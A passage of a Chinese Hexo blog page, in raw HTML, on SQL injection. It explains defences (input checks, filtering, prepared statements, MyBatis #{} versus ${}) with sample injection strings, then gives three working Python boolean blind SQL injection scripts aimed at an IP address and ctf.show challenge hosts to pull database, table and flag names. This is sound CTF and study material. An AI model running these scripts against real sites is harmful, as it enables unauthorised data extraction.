class="string">'Illegal Char'</span> <span class="keyword">in</span> res.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"该字符是非法字符: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"通过: {0}"</span>.<span class="built_in">format</span>(char))</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<h2 id="etc1-SQL注入的防御" >
<a href="#etc1-SQL注入的防御" class="heading-link"><i class="fas fa-link"></i></a><a href="#etc1-SQL注入的防御" class="headerlink" title="etc1 SQL注入的防御"></a>etc1 SQL注入的防御</h2>
<h3 id="1、检查变量数据类型和格式" >
<a href="#1、检查变量数据类型和格式" class="heading-link"><i class="fas fa-link"></i></a><a href="#1、检查变量数据类型和格式" class="headerlink" title="1、检查变量数据类型和格式"></a><strong>1、检查变量数据类型和格式</strong></h3>
<p> 如果你的SQL语句是类似where id={$id}这种形式,数据库里所有的id都是数字,那么就应该在SQL被执行前,检查确保变量id是int类型;如果是接受邮箱,那就应该检查并严格确保变量一定是邮箱的格式,其他的类型比如日期、时间等也是一个道理。总结起来:只要是有固定格式的变量,在SQL语句执行前,应该严格按照固定格式去检查,确保变量是我们预想的格式,这样很大程度上可以避免SQL注入攻击。<br> 比如,我们前面接受username参数例子中,我们的产品设计应该是在用户注册的一开始,就有一个用户名的规则,比如5-20个字符,只能由大小写字母、数字以及一些安全的符号组成,不包含特殊字符。此时我们应该有一个check_username的函数来进行统一的检查。不过,仍然有很多例外情况并不能应用到这一准则,比如文章发布系统,评论系统等必须要允许用户提交任意字符串的场景,这就需要采用过滤等其他方案了。</p>
<h3 id="2、过滤特殊符号" >
<a href="#2、过滤特殊符号" class="heading-link"><i class="fas fa-link"></i></a><a href="#2、过滤特殊符号" class="headerlink" title="2、过滤特殊符号"></a><strong>2、过滤特殊符号</strong></h3>
<p> 对于无法确定固定格式的变量,一定要进行特殊符号过滤或转义处理。</p>
<h3 id="3、绑定变量,使用预编译语句" >
<a href="#3、绑定变量,使用预编译语句" class="heading-link"><i class="fas fa-link"></i></a><a href="#3、绑定变量,使用预编译语句" class="headerlink" title="3、绑定变量,使用预编译语句"></a><strong>3、绑定变量,使用预编译语句</strong></h3>
<p> MySQL的mysqli驱动提供了预编译语句的支持,不同的程序语言,都分别有使用预编译语句的方法</p>
<p> 实际上,绑定变量使用预编译语句是预防SQL注入的最佳方式,使用预编译的SQL语句语义不会发生改变,在SQL语句中,变量用问号?表示,黑客即使本事再大,也无法改变SQL语句的结构</p>
<h2 id="etc2-预编译" >
<a href="#etc2-预编译" class="heading-link"><i class="fas fa-link"></i></a><a href="#etc2-预编译" class="headerlink" title="etc2 预编译"></a>etc2 预编译</h2>
<h3 id="1-什么是sql预编译" >
<a href="#1-什么是sql预编译" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-什么是sql预编译" class="headerlink" title="1 什么是sql预编译**"></a>1 什么是sql预编译**</h3>
<p>1.1:预编译语句是什么 </p>
<p>通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程:</p>
<ol>
<li>词法和语义解析 </li>
<li>优化sql语句,制定执行计划</li>
<li>执行并返回结果</li>
</ol>
<p>我们把这种普通语句称作Immediate Statements。 </p>
<p>但是很多情况,我们的一条sql语句可能会反复执行,或者每次执行的时候只有个别的值不同(比如query的where子句值不同,update的set子句值不同,insert的values值不同)。<br>如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。</p>
<p> 所谓预编译语句就是将这类语句中的值用占位符替代,可以视为将sql语句模板化或者说参数化,一般称这类语句叫Prepared Statements或者Parameterized Statements<br> 预编译语句的优势在于归纳为:一次编译、多次运行,省去了解析优化等过程;此外预编译语句能防止sql注入。<br> 当然就优化来说,很多时候最优的执行计划不是光靠知道sql语句的模板就能决定了,往往就是需要通过具体值来预估出成本代价。</p>
<p>1.2: MySQL的预编译功能</p>
<p> <strong>注意MySQL的老版本(4.1之前)是不支持服务端预编译的,但基于目前业界生产环境普遍情况,基本可以认为MySQL支持服务端预编译。</strong></p>
<p> 下面我们来看一下MySQL中预编译语句的使用。<br> (1)建表 首先我们有一张测试表t,结构如下所示:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql> show create table t\G</span><br><span class="line">*************************** 1. row ***************************</span><br><span class="line"> Table: t</span><br><span class="line">Create Table: CREATE TABLE `t` (</span><br><span class="line"> `a` int(11) DEFAULT NULL,</span><br><span class="line"> `b` varchar(20) DEFAULT NULL,</span><br><span class="line"> UNIQUE KEY `ab` (`a`,`b`)</span><br><span class="line">) ENGINE=InnoDB DEFAULT CHARSET=utf8</span><br></pre></td></tr></table></div></figure>
<p> (2)编译</p>
<p> 我们接下来通过 <code>PREPARE stmt_name FROM preparable_stm</code>的语法来预编译一条sql语句</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql> prepare ins from 'insert into t select ?,?';</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br><span class="line">Statement prepared</span><br></pre></td></tr></table></div></figure>
<p> (3)执行</p>
<p> 我们通过<code>EXECUTE stmt_name [USING @var_name [, @var_name] ...]</code>的语法来执行预编译语句</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">mysql> set @a=999,@b='hello';</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br><span class="line"> </span><br><span class="line">mysql> execute ins using @a,@b;</span><br><span class="line">Query OK, 1 row affected (0.01 sec)</span><br><span class="line">Records: 1 Duplicates: 0 Warnings: 0</span><br><span class="line"> </span><br><span class="line">mysql> select * from t;</span><br><span class="line">+------+-------+</span><br><span class="line">| a | b |</span><br><span class="line">+------+-------+</span><br><span class="line">| 999 | hello |</span><br><span class="line">+------+-------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></div></figure>
<p> 可以看到,数据已经被成功插入表中。</p>
<p> MySQL中的预编译语句作用域是session级,但我们可以通过max_prepared_stmt_count变量来控制全局最大的存储的预编译语句。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysql> set @@global.max_prepared_stmt_count=1;</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br><span class="line"> </span><br><span class="line">mysql> prepare sel from 'select * from t';</span><br><span class="line">ERROR 1461 (42000): Can't create more than max_prepared_stmt_count statements (current value: 1)</span><br></pre></td></tr></table></div></figure>
<p>当预编译条数已经达到阈值时可以看到MySQL会报如上所示的错误。</p>
<p> (4)释放<br> 如果我们想要释放一条预编译语句,则可以使用<code>{DEALLOCATE | DROP} PREPARE stmt_name</code>的语法进行操作:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql> deallocate prepare ins;</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br></pre></td></tr></table></div></figure>
<h3 id="2:为什么PrepareStatement可以防止sql注入" >
<a href="#2:为什么PrepareStatement可以防止sql注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#2:为什么PrepareStatement可以防止sql注入" class="headerlink" title="2:为什么PrepareStatement可以防止sql注入"></a><strong>2:为什么PrepareStatement可以防止sql注入</strong></h3>
<p> 原理是采用了预编译的方法,先将SQL语句中可被客户端控制的参数集进行编译,生成对应的临时变量集,再使用对应的设置方法,为临时变量集里面的元素进行赋值,赋值函数setString(),会对传入的参数进行强制类型检查和安全检查,所以就避免了SQL注入的产生。下面具体分析</p>
<p> (1):为什么Statement会被sql注入</p>
<p> 因为Statement之所以会被sql注入是因为SQL语句结构发生了变化。比如:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">"select*from tablename where username='"+uesrname+ </span><br><span class="line">"'and password='"+password+"'"</span><br></pre></td></tr></table></div></figure>
<p> 在用户输入’or true or’之后sql语句结构改变。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select*from tablename where username=''or true or'' and password=''</span><br></pre></td></tr></table></div></figure>
<p> 这样本来是判断用户名和密码都匹配时才会计数,但是经过改变后变成了或的逻辑关系,不管用户名和密码是否匹配该式的返回值永远为true;</p>
<p> (2)为什么Preparement可以防止SQL注入。</p>
<p> 因为Preparement样式为</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select*from tablename where username=? and password=?</span><br></pre></td></tr></table></div></figure>
<p> 该SQL语句会在得到用户的输入之前先用数据库进行预编译,这样的话不管用户输入什么用户名和密码的判断始终都是并的逻辑关系,防止了SQL注入</p>
<p> 简单总结,参数化能防注入的原因在于,语句是语句,参数是参数,参数的值并不是语句的一部分,数据库只按语句的语义跑,至于跑的时候是带一个普通背包还是一个怪物,不会影响行进路线,无非跑的快点与慢点的区别。</p>
<hr>
<h3 id="3:mybatis是如何防止SQL注入的" >
<a href="#3:mybatis是如何防止SQL注入的" class="heading-link"><i class="fas fa-link"></i></a><a href="#3:mybatis是如何防止SQL注入的" class="headerlink" title="3:mybatis是如何防止SQL注入的"></a><strong>3:mybatis是如何防止SQL注入的</strong></h3>
<p> 1、首先看一下下面两个sql语句的区别:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap"></span><br><span class="line">select id, username, password, role</span><br><span class="line">from user</span><br><span class="line">where username = #{username,jdbcType=VARCHAR}</span><br><span class="line">and password = #{password,jdbcType=VARCHAR}</span><br><span class="line"></select></span><br></pre></td></tr></table></div></figure>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap"></span><br><span class="line">select id, username, password, role</span><br><span class="line">from user</span><br><span class="line">where username = ${username,jdbcType=VARCHAR}</span><br><span class="line">and password = ${password,jdbcType=VARCHAR}</span><br><span class="line"></select></span><br></pre></td></tr></table></div></figure>
<p><strong>mybatis中的#和$的区别:</strong></p>
<p> 1、#将传入的数据都当成一个字符串,会对自动传入的数据加一个双引号。<br>如:where username=#{username},如果传入的值是111,那么解析成sql时的值为where username=”111”, 如果传入的值是id,则解析成的sql为where username=”id”. <br> 2、$将传入的数据直接显示生成在sql中。<br>如:where username=${username},如果传入的值是111,那么解析成sql时的值为where username=111;<br>如果传入的值是;drop table user;,则解析成的sql为:select id, username, password, role from user where username=;drop table user;<br> 3、#方式能够很大程度防止sql注入,$方式无法防止Sql注入。<br> 4、$方式一般用于传入数据库对象,例如传入表名.<br> 5、一般能用#的就别用$,若不得不使用“${xxx}”这样的参数,要手工地做好过滤工作,来防止sql注入攻击。<br> 6、在MyBatis中,“${xxx}”这样格式的参数会直接参与SQL编译,从而不能避免注入攻击。但涉及到动态表名和列名时,只能使用“${xxx}”这样的参数格式。所以,这样的参数需要我们在代码中手工进行处理来防止注入。**<br>【结论】在编写MyBatis的映射语句时,尽量采用“#{xxx}”这样的格式。若不得不使用“${xxx}”这样的参数,要手工地做好过滤工作,来防止SQL注入攻击。**</p>
<h3 id="4-mybatis是如何做到防止sql注入的" >
<a href="#4-mybatis是如何做到防止sql注入的" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-mybatis是如何做到防止sql注入的" class="headerlink" title="4 mybatis是如何做到防止sql注入的"></a>4 mybatis是如何做到防止sql注入的</h3>
<p> MyBatis框架作为一款半自动化的持久层框架,其SQL语句都要我们自己手动编写,这个时候当然需要防止SQL注入。其实,MyBatis的SQL是一个具有“<strong>输入+输出</strong>”的功能,类似于函数的结构,参考上面的两个例子。其中,parameterType表示了输入的参数类型,resultType表示了输出的参数类型。回应上文,如果我们想防止SQL注入,理所当然地要在输入参数上下功夫。上面代码中使用#的即输入参数在SQL中拼接的部分,传入参数后,打印出执行的SQL语句,会看到SQL是这样的:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select id, username, password, role from user where username=? and password=?</span><br></pre></td></tr></table></div></figure>
<p> 不管输入什么参数,打印出的SQL都是这样的。这是因为MyBatis启用了预编译功能,在SQL执行前,会先将上面的SQL发送给数据库进行编译;执行时,直接使用编译好的SQL,替换占位符“?”就可以了。因为SQL注入只能对编译过程起作用,所以这样的方式就很好地避免了SQL注入的问题。</p>
<p> 【底层实现原理】MyBatis是如何做到SQL预编译的呢?其实在框架底层,是JDBC中的PreparedStatement类在起作用,PreparedStatement是我们很熟悉的Statement的子类,它的对象包含了编译好的SQL语句。这种“准备好”的方式不仅能提高安全性,而且在多次执行同一个SQL时,能够提高效率。原因是SQL已编译好,再次执行时无需再编译</p>
<h2 id="脚本" >
<a href="#脚本" class="heading-link"><i class="fas fa-link"></i></a><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h2>
<h3 id="sql布尔盲注" >
<a href="#sql布尔盲注" class="heading-link"><i class="fas fa-link"></i></a><a href="#sql布尔盲注" class="headerlink" title="sql布尔盲注"></a>sql布尔盲注</h3>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">url = <span class="string">"http://124.156.121.112:28069/?id=-1'/**/"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">db</span>(<span class="params">url</span>):</span> <span class="comment">#爆库名</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>,<span class="number">128</span>):</span><br><span class="line"> u= <span class="string">"or/**/ascii(substr(database()/**/from/**/"</span>+<span class="built_in">str</span>(i)+<span class="string">"/**/for/**/1))="</span>+<span class="built_in">str</span>(j)+<span class="string">"#"</span></span><br><span class="line"> s = url+u</span><br><span class="line"> <span class="built_in">print</span>(s)</span><br><span class="line"> r = requests.get(s)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'By Rudyard Kipling'</span> <span class="keyword">in</span> r.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">table</span>(<span class="params">url</span>):</span> <span class="comment">#爆表名</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line"> table_name=<span class="string">''</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>,<span class="number">128</span>):</span><br><span class="line"> u=<span class="built_in">id</span>=<span class="string">"||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"</span>+<span class="built_in">str</span>(i)+<span class="string">")/**/from/**/"</span>+<span class="built_in">str</span>(j)+<span class="string">"/**/for/**/1))="</span>+<span class="built_in">str</span>(k)+<span class="string">"#"</span></span><br><span class="line"> s = url+u</span><br><span class="line"> <span class="built_in">print</span>(s)</span><br><span class="line"> r = requests.get(s) </span><br><span class="line"> <span class="keyword">if</span> <span class="string">'By Rudyard Kipling'</span> <span class="keyword">in</span> r.text:</span><br><span class="line"> table_name+=<span class="built_in">chr</span>(k)</span><br><span class="line"> <span class="built_in">print</span>(table_name)</span><br></pre></td></tr></table></div></figure>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">s=requests.session()</span><br><span class="line">url=<span class="string">'https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'</span></span><br><span class="line">table=<span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">45</span>):</span><br><span class="line"> <span class="built_in">print</span>(i)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">31</span>,<span class="number">128</span>):</span><br><span class="line"> <span class="comment">#爆表名 flag</span></span><br><span class="line"> payload = <span class="string">"ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"</span>%(<span class="built_in">str</span>(i),<span class="built_in">str</span>(j))</span><br><span class="line"> <span class="comment">#爆字段名 flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))</span></span><br><span class="line"> <span class="comment">#读取flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))</span></span><br><span class="line"></span><br><span class="line"> ra = s.get(url=url + <span class="string">'?id=0/**/or/**/'</span> + payload).text</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'I asked nothing'</span> <span class="keyword">in</span> ra:</span><br><span class="line"> table += <span class="built_in">chr</span>(j)</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">s=requests.session()</span><br><span class="line">url=<span class="string">'http://ab7573d3-1de2-42bd-bc68-26aaca8af4dc.chall.ctf.show/index.php'</span></span><br><span class="line">table=<span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">45</span>):</span><br><span class="line"> <span class="built_in">print</span>(i)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">31</span>,<span class="number">128</span>):</span><br><span class="line"> <span class="comment">#爆表名 flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))</span></span><br><span class="line"> <span class="comment">#爆字段名 flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))</span></span><br><span class="line"> <span class="comment">#读取flag</span></span><br><span class="line"> payload = <span class="string">"ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"</span>%(<span class="built_in">str</span>(i), <span class="built_in">str</span>(j))</span><br><span class="line"></span><br><span class="line"> ra = s.get(url=url + <span class="string">'?id=0/**/or/**/'</span> + payload).text</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'I asked nothing'</span> <span class="keyword">in</span> ra:</span><br><span class="line"> table += <span class="built_in">chr</span>(j)</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
</div></div></article><article class="postlist-item post"><header class="post-header"><h1 class="post-title"><a class="post-title__link" href="/2021/12/01/hello-world/">Hello World</a></h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-12-01</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-12-01</span></span></div></header><div class="post-body"><div class="post-excerpt"><p>Welcome to <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/" >Hexo</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>! This is your very first post. Check <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/" >documentation</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> for more info. If you get any problems when using Hexo, you can find the answer in <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/troubleshooting.html" >troubleshooting</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> or you can ask me on <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://github.com/hexojs/hexo/issues" >GitHub</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>.</p>
<h2 id="Quick-Start" >
<a href="#Quick-Start" class="heading-link"><i class="fas fa-link"></i></a><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2>
<h3 id="Create-a-new-post" >
<a href="#Create-a-new-post" class="heading-link"><i class="fas fa-link"></i></a><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/writing.html" >Writing</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<h3 id="Run-server" >
<a href="#Run-server" class="heading-link"><i class="fas fa-link"></i></a><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/server.html" >Server</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<h3 id="Generate-static-files" >
<a href="#Generate-static-files" class="heading-link"><i class="fas fa-link"></i></a><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/generating.html" >Generating</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<h3 id="Deploy-to-remote-sites" >
<a href="#Deploy-to-remote-sites" class="heading-link"><i class="fas fa-link"></i></a><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/one-command-deployment.html" >Deployment</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</div></div></article></section><nav class="paginator"><div class="paginator-inner"><span class="page-number current">1</span></div></nav></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><section class="sidebar-toc hide"></section><!-- ov = overview--><section class="sidebar-ov"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/stun-logo.svg" alt="avatar"></div><p class="sidebar-ov-author__text">hello world</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">2</div><div class="sidebar-ov-state-item__name">Archives</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>John Doe</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>